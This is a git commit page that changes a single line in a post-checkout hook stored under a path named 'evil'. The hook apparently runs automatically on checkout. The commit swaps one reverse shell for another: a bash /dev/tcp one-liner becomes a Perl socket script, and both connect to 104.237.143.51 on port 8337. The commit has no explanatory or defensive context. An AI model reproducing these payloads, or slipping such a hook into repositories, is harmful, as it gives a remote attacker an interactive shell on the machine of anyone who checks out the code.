Update modules/1/2/3/4/evil/hooks/post-checkout

This commit is contained in:
z0rs 2024-01-11 23:52:36 -06:00
parent 0081bedcbb
commit 442c814939
1 changed files with 1 additions and 1 deletions

View File

@ -1,2 +1,2 @@
#!/bin/sh #!/bin/sh
echo "sh -i >& /dev/tcp/104.237.143.51/8337 0>&1" | sh perl -e 'use Socket;$i="104.237.143.51";$p=8337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'